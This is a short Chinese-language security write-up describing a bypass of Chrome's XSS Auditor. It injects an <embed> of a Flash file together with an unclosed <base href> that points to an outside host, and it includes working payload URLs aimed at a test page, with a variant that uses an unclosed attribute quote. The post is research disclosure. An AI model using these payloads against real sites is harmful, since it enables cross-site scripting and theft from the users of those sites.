利用Flash和base标签绕过XSS Auditor
几天前,我正在和Mario一起研究如何绕过Chrome的XSS Auditor。Mario发现了这种绕过方法:
XSS Auditor Bypasses 05.2016
我也发现了另一种绕过方式。在本文中,我将分享我的攻击向量。
攻击向量
1
2
3
|
https://vulnerabledoma.in/xss_auditortest?test=1&q=<embed+allowscriptaccess=always+src=/xss.swf><base+href=//l0.cm/
<div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>
|
让我们来看看实现这种绕过的过程。
分析过程
使用<embed>标签获取外部资源会被拦截:
1
2
3
|
https://vulnerabledoma.in/xss_auditortest?test=1&q=<embed+src=https://evil/>
<embed src=https://evil/>
|
但是获取同源且没有查询字符串的资源不会被拦截:
1
2
3
|
https://vulnerabledoma.in/xss_auditortest?test=1&q=<embed+src=/aaa>
<embed src=/aaa>
|
因此,如果我们能改变基础URL,就有可能实施XSS攻击。
<base>标签通常也会被拦截,但如果它没有用>闭合,在某些情况下Auditor不会拦截。
以下情况会被拦截:
1
2
3
|
https://vulnerabledoma.in/xss_auditortest?test=3&q=<base+href=//evil/
<div><base href=//evil/ </div>
|
但以下情况不会被拦截:
1
2
3
|
https://vulnerabledoma.in/xss_auditortest?test=1&q=<base+href=//evil/
<div><base href=//evil/</div>
|
你能看出区别吗?前者的注入点后面有一个空格。看起来如果页面在注入点后面直接有空格,就会被Auditor拦截。换句话说,如果页面在注入点后面没有直接的空格,我们就可以注入base标签而不被拦截。
因此,我的攻击向量有效!
1
2
3
|
https://vulnerabledoma.in/xss_auditortest?test=1&q=<embed+allowscriptaccess=always+src=/xss.swf><base+href=//l0.cm/
<div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>
|
那么,如果页面在注入点后面有空格,我们就无法绕过吗?不!我们仍然有机会绕过。如果在注入点下方存在"字符,我们可以使用未闭合的属性引号来绕过Auditor,例如<base href="//evil/。
在以下条件下不会被拦截:
1
2
3
4
5
|
https://vulnerabledoma.in/xss_auditortest?test=4&q=<embed+allowscriptaccess=always+src=/xss.swf><base+href="//l0.cm/
<div>
<embed allowscriptaccess=always src=/xss.swf><base href="//l0.cm/
</div><div id="x">AAA</div>
|
我认为这种绕过很有用,因为大多数页面在注入点下方都有"字符。
另外,<script src=/xss.js></script><base href=//evil/也不会被拦截。但我们无法加载外部资源,因为在设置基础URL之前就开始加载了:
1
|
https://vulnerabledoma.in/xss_auditortest?test=1&q=%3Cscript%20src=/xss.js%3E%3C/script%3E%3Cbase%20href=//evil/
|
因此,我使用了Flash。
这就是全部内容。感谢阅读我的文章 :)